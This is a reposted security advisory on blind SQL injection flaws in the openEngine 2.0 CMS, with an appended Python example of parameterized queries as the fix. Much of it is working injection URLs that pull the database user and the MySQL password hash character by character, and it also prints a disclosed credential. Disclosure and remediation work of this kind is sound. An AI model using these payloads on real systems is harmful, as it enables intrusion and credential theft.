openEngine 2.0: Multiple Blind SQL Injection Flaws and Fixes

Source: 自学PHP网    Date: 2015-04-17 14:47

Title: openEngine 2.0 'key' Blind SQL Injection vulnerability
Author: Stefan Schurtz
Affected software: Successfully tested on openEngine 2.0 100226
Developer: http://www.openengine.de/
Overview:
==========================
 
The 'key' parameter in openEngine 2.0 is prone to a Blind SQL Injection
 
==================
Technical analysis
==================
 
# Database information
User: easy
 
# Blind SQL injection:
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2 -> "Sie möchten die Seite versenden."
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1 -> "Sie möchten die Seite Homepage (de) versenden."
 
# User-Guessing
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121
 
=========
Solution:
=========
 
Apply a targeted fix and input filtering.
 
 
Title: openEngine 2.0 'id' Blind SQL Injection
Overview:
==========================
 
openEngine 2.0 contains a blind SQL injection flaw.
 
==================
Technical analysis:
==================
 
Database information
 
User: easy
Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)
 
Blind SQL Injection
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND 1=1
AND ('a'='a&key= <- error
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND 1=0
AND ('a'='a&key= <- no error
 
User-Guessing
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 AND ('a'='a
<- error (e)
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 AND ('a'='a <-
error (a)
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 AND ('a'='a
<- error (s)
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM
information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121 AND ('a'='a
<- error (y)
 
Password(Hash)-Guessing
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM
mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),1,1)) = 42 AND
('a'='a <- error (*)
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM
mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),2,1)) = 69 AND
('a'='a <- error (E)
 
http://www.2cto.com /openengine/cms/website.php?id=/de/sendpage.htm') AND
ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM
mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),3,1)) = 56 AND
('a'='a <- error (8)
... and so on
 
=========
Solution:
=========
Apply a targeted fix and input filtering.
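
The fix named in both Solution sections, as an added example (not openEngine's code and not part of the original advisories): one lookup built by string concatenation, then the same lookup with allow-list validation and bound parameters. The `pages` table, its columns, the function names, the rule that `key` is a short decimal number, and the use of Python with SQLite in place of the PHP/MySQL stack are assumptions made for illustration.

```python
import re
import sqlite3

PATH_RE = re.compile(r"/[A-Za-z0-9_./-]{1,200}")   # allow-list for the id value
KEY_RE = re.compile(r"[0-9]{1,10}")                # assumed: key is a short decimal

def make_db():
    """Constructed stand-in data; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (page_key INTEGER, path TEXT, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?, ?)", [
        (7, "/de/index.htm", "Homepage (de)"),
        (8, "/de/sendpage.htm", "Seite versenden"),
    ])
    return db

def lookup_vulnerable(db, page_id, key):
    # 'Before': request values are pasted into the SQL text, so the database
    # parses them as SQL. id lands inside ('...'), key in a numeric context.
    where = "(path = '" + page_id + "')"
    if key:
        where += " AND page_key = " + key
    return db.execute("SELECT title FROM pages WHERE " + where).fetchall()

def lookup_hardened(db, page_id, key):
    # 'After', step 1: reject anything that is not shaped like a path / number.
    if not PATH_RE.fullmatch(page_id):
        raise ValueError("invalid id")
    if key and not KEY_RE.fullmatch(key):
        raise ValueError("invalid key")
    # Step 2: bind the values; a bound value cannot alter the statement.
    sql, args = "SELECT title FROM pages WHERE path = ?", [page_id]
    if key:
        sql += " AND page_key = ?"
        args.append(int(key))
    return db.execute(sql, args).fetchall()

if __name__ == "__main__":
    db = make_db()
    for key in ("8", "-1 OR 1=1", "-1 OR 1=2"):   # last two are from the advisory
        print(repr(key), "->", lookup_vulnerable(db, "/de/sendpage.htm", key))
        try:
            print("   hardened:", lookup_hardened(db, "/de/sendpage.htm", key))
        except ValueError as exc:
            print("   hardened: rejected,", exc)
```

Binding is what removes the injection; the allow-list only narrows what reaches the query. The advisory's queries against `mysql.user` returned data, which indicates the application's database account held more privilege than a CMS needs.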
